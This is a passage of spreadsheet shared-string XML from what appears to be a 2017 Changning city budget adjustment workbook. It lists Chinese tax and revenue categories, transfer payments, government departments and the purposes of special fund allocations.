  </si>
  <si>
    <t>九、医疗卫生</t>
  </si>
  <si>
    <t xml:space="preserve">    房产税</t>
  </si>
  <si>
    <t>十、节能环保</t>
  </si>
  <si>
    <t xml:space="preserve">    印花税</t>
  </si>
  <si>
    <t>十一、城乡社区事务</t>
  </si>
  <si>
    <t xml:space="preserve">    城镇土地使用税</t>
  </si>
  <si>
    <t>十二、农林水事务</t>
  </si>
  <si>
    <t xml:space="preserve">    土地增值税</t>
  </si>
  <si>
    <t>十三、交通运输</t>
  </si>
  <si>
    <t xml:space="preserve">    车船使用和牌照税</t>
  </si>
  <si>
    <t>十四、资源勘探电力信息等事务</t>
  </si>
  <si>
    <t xml:space="preserve">    烟叶税</t>
  </si>
  <si>
    <t>十五、商业服务业等事务</t>
  </si>
  <si>
    <t xml:space="preserve">    耕地占用税</t>
  </si>
  <si>
    <t>十六、金融监管等事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    契税</t>
  </si>
  <si>
    <t>十七、地震灾后恢复重建支出</t>
  </si>
  <si>
    <t>二、非税收入</t>
  </si>
  <si>
    <t>十八、国土资源气象等事务</t>
  </si>
  <si>
    <t xml:space="preserve">    专项收入</t>
  </si>
  <si>
    <t>十九、住房保障支出</t>
  </si>
  <si>
    <t xml:space="preserve">    行政性收费收入</t>
  </si>
  <si>
    <t>二十、粮油物资储备事务</t>
  </si>
  <si>
    <t xml:space="preserve">    罚没收入</t>
  </si>
  <si>
    <t>二十一、预备费</t>
  </si>
  <si>
    <t xml:space="preserve">    国有资源有偿使用收入</t>
  </si>
  <si>
    <t>二十二、其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他收入</t>
  </si>
  <si>
    <t>二十三、地方政府债务付息支出</t>
  </si>
  <si>
    <t>一般预算收入小计</t>
  </si>
  <si>
    <t>一般预算支出小计</t>
  </si>
  <si>
    <t>上级补助收入小计</t>
  </si>
  <si>
    <t>转移性支出</t>
  </si>
  <si>
    <t xml:space="preserve"> 返还性收入</t>
  </si>
  <si>
    <t xml:space="preserve">   原体制上解支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">增值税和消费税税收返还收入 </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">   出口退税专项上解支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 所得税基数返还收入</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">   体制结算上解</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 成品油价格和税费改革税收返还收入</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">   专项上解支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他税收返还收入</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 一般性转移支付收入</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>均衡性转移支付补助收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>老少边穷转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>县级基本财力保障机制奖补收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>结算补助收入</t>
    </r>
  </si>
  <si>
    <t>财政部代理发行地方政府债券还本</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资源枯竭城市转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>企事业单位预算划转补助收入</t>
    </r>
  </si>
  <si>
    <t>结余</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基层公检法司转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>义务教育等转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基本养老保险和低保等转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>新型农村合作医疗等转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村综合改革转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>产粮（油）大县奖励资金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>生态功能区转移支付补助收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>固定数额补助收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他一般性转移支付收入</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 专项转移支付补助收入</t>
  </si>
  <si>
    <t xml:space="preserve">   一般公共服务</t>
  </si>
  <si>
    <t xml:space="preserve">   公共安全</t>
  </si>
  <si>
    <t xml:space="preserve">   教育</t>
  </si>
  <si>
    <t xml:space="preserve">   科学技术</t>
  </si>
  <si>
    <t xml:space="preserve">   文化体育传媒</t>
  </si>
  <si>
    <t xml:space="preserve">   社会保障</t>
  </si>
  <si>
    <t xml:space="preserve">   医疗卫生</t>
  </si>
  <si>
    <t xml:space="preserve">   环境保护</t>
  </si>
  <si>
    <t xml:space="preserve">   城乡社区</t>
  </si>
  <si>
    <t xml:space="preserve">   农林水事务</t>
  </si>
  <si>
    <t xml:space="preserve">   交通运输</t>
  </si>
  <si>
    <t xml:space="preserve">   资源勘探</t>
  </si>
  <si>
    <t xml:space="preserve">   商业服务</t>
  </si>
  <si>
    <t xml:space="preserve">   金融支出</t>
  </si>
  <si>
    <t xml:space="preserve">   国土海洋气象</t>
  </si>
  <si>
    <t xml:space="preserve">   住房保障</t>
  </si>
  <si>
    <t xml:space="preserve">   粮油物资储备</t>
  </si>
  <si>
    <t xml:space="preserve">   其他</t>
  </si>
  <si>
    <t>转贷财政部代理发行地方政府债券收入</t>
  </si>
  <si>
    <t>转贷财政部代理发行地方政府置换债券收入</t>
  </si>
  <si>
    <t>政府性基金调入</t>
  </si>
  <si>
    <t>上年结转收入</t>
  </si>
  <si>
    <t>收  入  合  计</t>
  </si>
  <si>
    <t>支出合计</t>
  </si>
  <si>
    <t>收入项目</t>
  </si>
  <si>
    <t>财  政  总  收  入</t>
  </si>
  <si>
    <t>备注</t>
  </si>
  <si>
    <t>本年预算</t>
  </si>
  <si>
    <t>上年完成</t>
  </si>
  <si>
    <t>1-9月完成数</t>
  </si>
  <si>
    <t>占年度预算</t>
  </si>
  <si>
    <t>增减(+、-)</t>
  </si>
  <si>
    <t>增减后预算</t>
  </si>
  <si>
    <t>增长%</t>
  </si>
  <si>
    <t>国税部门合计</t>
  </si>
  <si>
    <t>地税部门合计</t>
  </si>
  <si>
    <t xml:space="preserve">    教育费附加收入</t>
  </si>
  <si>
    <t xml:space="preserve">    地方教育附加收入</t>
  </si>
  <si>
    <t xml:space="preserve">    残疾人就业保障金收入</t>
  </si>
  <si>
    <t xml:space="preserve">    水利建设专项收入</t>
  </si>
  <si>
    <t>财政部门合计</t>
  </si>
  <si>
    <t xml:space="preserve">  排污费收入</t>
  </si>
  <si>
    <t xml:space="preserve">  水资源费收入</t>
  </si>
  <si>
    <t xml:space="preserve">  矿产资源专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">  文化事业建设费收入</t>
  </si>
  <si>
    <t xml:space="preserve">  残疾人就业保障金收入</t>
  </si>
  <si>
    <t xml:space="preserve">  教育资金收入</t>
  </si>
  <si>
    <t xml:space="preserve">  农田水利建设资金收入</t>
  </si>
  <si>
    <t xml:space="preserve">  育林基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">  森林植被恢复费</t>
  </si>
  <si>
    <t xml:space="preserve">  水利建设专项收入</t>
  </si>
  <si>
    <t>收入合计</t>
  </si>
  <si>
    <t>年初预算</t>
  </si>
  <si>
    <t>增长率</t>
  </si>
  <si>
    <t xml:space="preserve">  教育费附加收入</t>
  </si>
  <si>
    <t xml:space="preserve">  地方教育附加收入</t>
  </si>
  <si>
    <t>一般预算收入合计</t>
  </si>
  <si>
    <t>上划中央收入</t>
  </si>
  <si>
    <t xml:space="preserve">    上划中央“两税”</t>
  </si>
  <si>
    <t xml:space="preserve">    上划中央所得税</t>
  </si>
  <si>
    <t xml:space="preserve">    上划中央营业税</t>
  </si>
  <si>
    <t>上划省级收入</t>
  </si>
  <si>
    <t xml:space="preserve">    上划省级增值税</t>
  </si>
  <si>
    <t xml:space="preserve">    上划省级所得税</t>
  </si>
  <si>
    <t xml:space="preserve">    上划省级营业税</t>
  </si>
  <si>
    <t xml:space="preserve">    上划省级资源税</t>
  </si>
  <si>
    <t xml:space="preserve">    上划省级城镇土地使用税</t>
  </si>
  <si>
    <t>财政总收入合计</t>
  </si>
  <si>
    <t>国税部门收入</t>
  </si>
  <si>
    <t>地税部门收入</t>
  </si>
  <si>
    <t>财政部门收入</t>
  </si>
  <si>
    <t>科目代码</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">摘 </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">                     </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>要</t>
    </r>
  </si>
  <si>
    <t>单位名称</t>
  </si>
  <si>
    <t>支出调整数</t>
  </si>
  <si>
    <t>合    计</t>
  </si>
  <si>
    <t>新增转移支付资金</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 老少边穷转移支付收入</t>
    </r>
  </si>
  <si>
    <t>中央、省级增加精准扶贫资金</t>
  </si>
  <si>
    <t>2017年9月1日17届人大常委会第5次会议已批复内容</t>
  </si>
  <si>
    <t>小  计</t>
  </si>
  <si>
    <t>机关事业单位调资及绩效奖支出</t>
  </si>
  <si>
    <t>其他安排到项目的支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>其中：精准扶贫947万元</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（扶贫办90万元，住建548万元，商粮30万元，农合办279万元）</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">  一、机关事业专项资金</t>
  </si>
  <si>
    <t>201</t>
  </si>
  <si>
    <t>机关办公经费、2016－2017年度优秀综合调研成果经费</t>
  </si>
  <si>
    <t xml:space="preserve">中共常宁市委办公室 </t>
  </si>
  <si>
    <t>代表活动经费、衡阳市人大系统党章党规知识竞赛、衡阳人大系统“永乐杯”门球赛、离退休老干部经费、落实《决定》及“两所一队”监督工作、代表扶贫工作基地建设和产业扶持资金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市人民代表大会常务委员会办公室 </t>
  </si>
  <si>
    <t>归侨人员生活补助、供水系统维修费用、社会事务组工作经费、征兵办经费、结对帮扶、老干工作和机关党建</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市人民政府办公室 </t>
  </si>
  <si>
    <t>党建网维护</t>
  </si>
  <si>
    <t>中共常宁市委组织部</t>
  </si>
  <si>
    <t>赴台经贸交流、新春恳谈会中秋助学活动</t>
  </si>
  <si>
    <t xml:space="preserve">中共常宁市委统战部 </t>
  </si>
  <si>
    <t>精神病人收治经费</t>
  </si>
  <si>
    <t xml:space="preserve">中共常宁市政法委员会 </t>
  </si>
  <si>
    <t>《全面从严治党面对面》和《读有所得》读本经费、文明创建办文明城市创建、网管运行经费、四城同创经费、记者节活动经费</t>
  </si>
  <si>
    <t xml:space="preserve">中共常宁市委宣传部 </t>
  </si>
  <si>
    <t>信访维稳救助经费、信访案件轻刑快办奖金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市信访局 </t>
  </si>
  <si>
    <t>行政审批制度改革工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">中共常宁市委机构编制委员会办公室 </t>
  </si>
  <si>
    <t>人大扶贫工作现场会专项接待经费</t>
  </si>
  <si>
    <t xml:space="preserve">中共常宁市委常宁市人民政府接待处 </t>
  </si>
  <si>
    <t>政务中心运行经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市政务中心 </t>
  </si>
  <si>
    <t>电子政务事务经费、“两法”衔接网络</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市电子政务管理办公室 </t>
  </si>
  <si>
    <t>辅助调查员工资及专项调查工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">国家统计局常宁市农业调查队 </t>
  </si>
  <si>
    <t>机关群团事业单位羽乒联赛经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市事业登记局 </t>
  </si>
  <si>
    <t>跑省进厅争资工作经费、迎省检、债务管理、全市财政工作会议经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市财政局 </t>
  </si>
  <si>
    <t>门球场维修工程拆除费用、门球场维修工程设计费、预算费、监理费</t>
  </si>
  <si>
    <t xml:space="preserve">中共常宁市委老干部局 </t>
  </si>
  <si>
    <t>开展异地商会建设工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">湖南省常宁市工商业联合会 </t>
  </si>
  <si>
    <t>婚姻家庭纠纷调委会工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市妇女联合会 </t>
  </si>
  <si>
    <t>防范和处置非法集资工作经费、打击传销工作、查处取缔无照经营工作、食品药品抽样检验经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市市场与质量监督管理局 </t>
  </si>
  <si>
    <t>2017年全市非公经济组织和社会组织支部书记津贴经费</t>
  </si>
  <si>
    <t xml:space="preserve">中共常宁市委非公有制经济组织和社会组织工作委员会 </t>
  </si>
  <si>
    <t>金融大讲坛和两会工作经费、公务出行经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市人民政府金融工作办公室 </t>
  </si>
  <si>
    <t>2016年目标管理绩效考核单位奖金</t>
  </si>
  <si>
    <t>各单位</t>
  </si>
  <si>
    <t>各乡镇（街道）纪委（纪工委）谈话室建设专项经费、创省卫生镇、小城镇配套设施建设和维护、新农村建设、精准扶贫等</t>
  </si>
  <si>
    <t>各乡镇</t>
  </si>
  <si>
    <t>204</t>
  </si>
  <si>
    <t>205</t>
  </si>
  <si>
    <t>206</t>
  </si>
  <si>
    <t>207</t>
  </si>
  <si>
    <t>210</t>
  </si>
  <si>
    <t>216</t>
  </si>
  <si>
    <t>214</t>
  </si>
  <si>
    <t>213</t>
  </si>
  <si>
    <t>220</t>
  </si>
  <si>
    <t>215</t>
  </si>
  <si>
    <t xml:space="preserve">  二、国防公共安全专项资金</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>04</t>
    </r>
  </si>
  <si>
    <t>打击破坏经济发展环境违法犯罪小组运行经费、警犬驯养费用、禁毒以奖代补、特殊吸毒病人收治、消防车购置、平安常宁建设</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市公安局 </t>
  </si>
  <si>
    <t>协警人员经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市公安局交通警察大队 </t>
  </si>
  <si>
    <t>两庭建设、执行救助基金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市人民法院 </t>
  </si>
  <si>
    <t>社区矫正选派人员补助、司法项目经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市司法局 </t>
  </si>
  <si>
    <t>购买抗洪物资器材经费</t>
  </si>
  <si>
    <t>常宁市人民武装部</t>
  </si>
  <si>
    <t xml:space="preserve">  三、教育发展专项资金</t>
  </si>
  <si>
    <t>基建维修资金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市一中 </t>
  </si>
  <si>
    <t>新兵入伍培训经费</t>
  </si>
  <si>
    <t>常宁市广播电视学校</t>
  </si>
  <si>
    <t>兰江中学知心屋与教学楼维修</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市教育经费核算中心 </t>
  </si>
  <si>
    <t xml:space="preserve">  四、公共文化发展专项资金</t>
  </si>
  <si>
    <t>创作大型红色民族歌剧《八百矿工上井冈》经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市文体广电新闻出版局 </t>
  </si>
  <si>
    <t>“五进”文艺演出经费、文化馆免费开放配套等项目资金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市文化馆 </t>
  </si>
  <si>
    <t>图书馆免费开放、购书等专项经费</t>
  </si>
  <si>
    <t>常宁市图书馆</t>
  </si>
  <si>
    <t>2017年记者节庆祝活动经费、推介常宁典型和外出学习先进经验经费、2017年财政预算项目</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市广播电视台 </t>
  </si>
  <si>
    <t>宣传系统长寿杯文体表演活动</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市全民健身服务中心 </t>
  </si>
  <si>
    <t>文物保护重点工程项目服务组工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市文物局 </t>
  </si>
  <si>
    <t xml:space="preserve">  五、社会保障和就业专项资金</t>
  </si>
  <si>
    <t>农村住房和灾后农户基本生活救助保险</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市民政局 </t>
  </si>
  <si>
    <t>208</t>
  </si>
  <si>
    <t>兼职干部工资待遇补差</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市人力资源和社会保障局 </t>
  </si>
  <si>
    <t xml:space="preserve">  六、医疗卫生专项资金</t>
  </si>
  <si>
    <t>中医事业发展资金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市卫生和计划生育局 </t>
  </si>
  <si>
    <t>建档立卡贫困人口参合个人缴费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市新型农村合作医疗管理办公室 </t>
  </si>
  <si>
    <t>精准扶贫资金</t>
  </si>
  <si>
    <t xml:space="preserve">  七、国土环保专项资金</t>
  </si>
  <si>
    <t>地质灾害防治经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市国土资源局 </t>
  </si>
  <si>
    <t>211</t>
  </si>
  <si>
    <t xml:space="preserve">  八、城市建设和管理专项资金</t>
  </si>
  <si>
    <t>212</t>
  </si>
  <si>
    <t>水口山垃圾清运经费、城市桥梁安全检测、南塘街（东段）（西段）道路油化工程、燃气执法经费、2016年城建项目管理经费、农村危房改造工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市住房和城乡建设局 </t>
  </si>
  <si>
    <t>规划执法经费、违法建设专项治理</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市规划局 </t>
  </si>
  <si>
    <t>两江路人行道改造工程建设资金、渣土执法经费、牛皮癣清理、后勤人员定额补助</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市城市管理行政执法局机关 </t>
  </si>
  <si>
    <t>建设工程安全事务及“打非治违”工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市建设工程质量安全监督站 </t>
  </si>
  <si>
    <t>基础设施建设</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市城市和农村建设投资有限公司 </t>
  </si>
  <si>
    <t>列收列支</t>
  </si>
  <si>
    <t>城市公用水及低保户水费免收</t>
  </si>
  <si>
    <t>常宁市水务投</t>
  </si>
  <si>
    <t xml:space="preserve">  九、交通旅游建设专项资金</t>
  </si>
  <si>
    <t>交通秩序专项整治费用</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市交通运输和旅游局 </t>
  </si>
  <si>
    <t xml:space="preserve">  十、农林水专项资金</t>
  </si>
  <si>
    <t>农产品质量安全监管经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市农业局 </t>
  </si>
  <si>
    <t>森林公安协警补助、森林防火设备采购</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市林业局 </t>
  </si>
  <si>
    <t>动物疫病防控、畜牧水产事项经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市畜牧水产局 </t>
  </si>
  <si>
    <t>机关院内油化等资金</t>
  </si>
  <si>
    <t>常宁市天堂山国家森林公园管理处</t>
  </si>
  <si>
    <t>化解改革遗留问题资金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市弥泉国有林场 </t>
  </si>
  <si>
    <t>水稻机械化集中育秧经费、农机购置补贴工作经费、油茶机械化生产示范推广</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市农业机械管理局 </t>
  </si>
  <si>
    <t>为民办实事、统计年报、减负工作、一流转五服务经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市经管局 </t>
  </si>
  <si>
    <t>种子市场检查、种子救灾备荒种子储备基金、取消收费缺口</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市种子管理局 </t>
  </si>
  <si>
    <t>222</t>
  </si>
  <si>
    <t xml:space="preserve">  十一、新农村建设及扶贫专项资金</t>
  </si>
  <si>
    <t>花垣县结对扶贫、扶贫专项工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市农村扶贫开发办公室 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其中：精准扶贫90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
